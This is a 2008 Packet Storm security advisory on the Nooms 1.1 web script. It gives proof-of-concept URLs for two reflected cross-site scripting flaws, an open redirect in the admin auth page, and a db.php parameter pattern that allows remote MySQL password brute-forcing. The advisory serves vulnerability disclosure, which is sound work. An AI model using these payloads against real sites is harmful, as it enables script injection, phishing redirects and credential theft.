nooms-xss.txt

2008-09-11T00:00:00
ID PACKETSTORM:69875
Type packetstorm
Reporter IRCRASH
Modified 2008-09-11T00:00:00

Description

                                        
                                            `----------------------------------------------------------------  
  
Script : Nooms 1.1  
  
Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access)  
  
Risk : Medium  
  
----------------------------------------------------------------  
  
Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip  
  
----------------------------------------------------------------  
  
Discovered by : Khashayar Fereidani Or Dr.Crash  
  
My Website : HTTP://FEREIDANI.IR  
  
Team Website : Http://IRCRASH.COM  
  
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com  
  
----------------------------------------------------------------  
  
Mysql Remote Brute Force Vulnerability :  
  
  
This is new type of the vulnerabilities .  
  
I can't public Exploit of this vulnerability ,  
But with this vulnerability attacker can brute force root and other user password with php in remote mode .  
  
Mysql Brute Force Vulnerability : /db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password]  
  
----------------------------------------------------------------  
  
Cross Site Scripting Vulnerabilities :  
  
Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script>  
  
Xss 2 : http://Example/search.php?q="<script>alert('xss')</script>  
  
----------------------------------------------------------------  
  
Redirect Vulnerability :  
  
Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]  
  
----------------------------------------------------------------  
  
Tnx : God  
  
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR  
  
----------------------------------------------------------------  
`